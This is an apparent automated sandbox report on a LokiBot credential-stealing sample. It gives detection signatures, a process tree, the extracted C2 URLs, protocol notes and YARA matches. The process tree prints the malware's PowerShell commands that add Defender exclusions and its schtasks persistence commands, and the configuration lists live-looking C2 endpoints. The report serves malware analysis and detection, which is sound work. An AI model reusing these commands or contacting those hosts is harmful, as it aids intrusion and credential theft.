Edit tour

Windows Analysis Report
kzQ25HVUbf.exe

Overview

General Information

Sample name:	kzQ25HVUbf.exe renamed because original name is a hash value
Original sample name:	8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889.exe
Analysis ID:	1589028
MD5:	55550b1c9e27a22bc17744fc5cba030c
SHA1:	02508be8f94cd14e668d4892028a9a442671817c
SHA256:	8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889
Tags:	exeLokiuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

kzQ25HVUbf.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)

powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7924 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

kzQ25HVUbf.exe (PID: 8076 cmdline: "C:\Users\user\Desktop\kzQ25HVUbf.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)

iWEWjTXiqXke.exe (PID: 8176 cmdline: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe MD5: 55550B1C9E27A22BC17744FC5CBA030C)

schtasks.exe (PID: 7624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

iWEWjTXiqXke.exe (PID: 1796 cmdline: "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)

iWEWjTXiqXke.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe" MD5: 55550B1C9E27A22BC17744FC5CBA030C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x30150:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x1d51b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2bd5f:$des3: 68 03 66 00 00 0x30150:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x3021c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7c8d8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x69ca3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x784e7:$des3: 68 03 66 00 00 0x7c8d8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7c9a4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x78144:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x654f7:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x73d3b:$des3: 68 03 66 00 00 0x78144:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x78210:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x78068:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x6541b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x73c5f:$des3: 68 03 66 00 00 0x78068:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x78134:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: kzQ25HVUbf.exe PID: 7568	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: kzQ25HVUbf.exe PID: 7568	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: kzQ25HVUbf.exe PID: 7568	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: kzQ25HVUbf.exe PID: 7568	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6bddc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x8cfb6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: kzQ25HVUbf.exe PID: 8076	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: iWEWjTXiqXke.exe PID: 8176	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: iWEWjTXiqXke.exe PID: 8176	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: iWEWjTXiqXke.exe PID: 8176	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x200db:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: iWEWjTXiqXke.exe PID: 616	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: iWEWjTXiqXke.exe PID: 616	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: iWEWjTXiqXke.exe PID: 616	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x31f7:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
18.2.iWEWjTXiqXke.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.iWEWjTXiqXke.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.iWEWjTXiqXke.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.iWEWjTXiqXke.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
18.2.iWEWjTXiqXke.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.iWEWjTXiqXke.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.kzQ25HVUbf.exe.3d464e8.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.kzQ25HVUbf.exe.3d464e8.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.kzQ25HVUbf.exe.3d464e8.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.kzQ25HVUbf.exe.3d464e8.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.kzQ25HVUbf.exe.3d464e8.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

